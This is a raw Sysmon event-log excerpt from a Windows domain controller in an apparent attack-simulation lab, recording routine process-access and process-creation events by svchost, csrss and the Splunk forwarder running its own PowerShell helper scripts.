10341000x80000000000000004146Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:36:40.156{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004145Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:40.156{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004144Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:36:40.156{59A5CD1D-8E44-6005-0500-00000000A301}640756C:\Windows\system32\csrss.exe{59A5CD1D-8EE8-6005-DD00-00000000A301}2240C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000004143Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:40.156{59A5CD1D-8EE3-6005-B100-00000000A301}41242852C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{59A5CD1D-8EE8-6005-DD00-00000000A301}2240C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+7d35e7|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+7cdcb9|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+7ca4ec|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+7ca0a3|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+7c9f0d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+6d7908|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+6de2ee|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+6b29fa|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+6b4274|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+e42dc|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ec682|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+e9959|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+d7f31|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000004142Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:40.158{59A5CD1D-8EE8-6005-DD00-00000000A301}2240C:\Windows\System32\cmd.exe10.0.14393.0 
(rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.ExeC:\Windows\system32\cmd.exe /c ""C:\Program Files\SplunkUniversalForwarder\etc\system\bin\powershell2.cmd" --scheme"C:\Windows\system32\NT AUTHORITY\SYSTEM{59A5CD1D-8E44-6005-E703-000000000000}0x3e70SystemMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{59A5CD1D-8EE3-6005-B100-00000000A301}4124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x80000000000000004141Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:40.047{59A5CD1D-8EE3-6005-B500-00000000A301}28363856C:\Windows\system32\conhost.exe{59A5CD1D-8EE8-6005-DC00-00000000A301}3768C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004140Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:36:40.047{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004139Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:40.047{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004138Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:36:40.047{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004137Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:40.047{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004136Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:36:40.047{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004135Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:40.047{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004134Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:36:40.047{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004133Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:40.047{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004132Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:36:40.047{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004131Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:40.047{59A5CD1D-8E44-6005-0500-00000000A301}6401180C:\Windows\system32\csrss.exe{59A5CD1D-8EE8-6005-DC00-00000000A301}3768C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000004130Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:40.047{59A5CD1D-8EE3-6005-B100-00000000A301}41242852C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{59A5CD1D-8EE8-6005-DC00-00000000A301}3768C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+7d35e7|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+7cdcb9|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+7ca4ec|C:\Program 
Files\SplunkUniversalForwarder\bin\splunkd.exe+7ca0a3|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+7c9f0d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+6d7908|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+6de2ee|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+6b29fa|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+6b4274|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+e42dc|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ec682|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+e9959|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+d7f31|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000004129Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:40.048{59A5CD1D-8EE8-6005-DC00-00000000A301}3768C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.ExeC:\Windows\system32\cmd.exe /c ""C:\Program Files\SplunkUniversalForwarder\etc\system\bin\powershell.cmd" --scheme"C:\Windows\system32\NT AUTHORITY\SYSTEM{59A5CD1D-8E44-6005-E703-000000000000}0x3e70SystemMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{59A5CD1D-8EE3-6005-B100-00000000A301}4124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x80000000000000004195Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:43.954{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8EEB-6005-E000-00000000A301}5112C:\Program 
Files\SplunkUniversalForwarder\bin\splunk-wmi.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004194Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:43.954{59A5CD1D-8EE3-6005-B500-00000000A301}28363856C:\Windows\system32\conhost.exe{59A5CD1D-8EEB-6005-E000-00000000A301}5112C:\Program Files\SplunkUniversalForwarder\bin\splunk-wmi.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004193Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:36:43.954{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004192Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:43.954{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004191Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:36:43.954{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004190Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:43.954{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004189Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:36:43.954{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004188Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:43.954{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 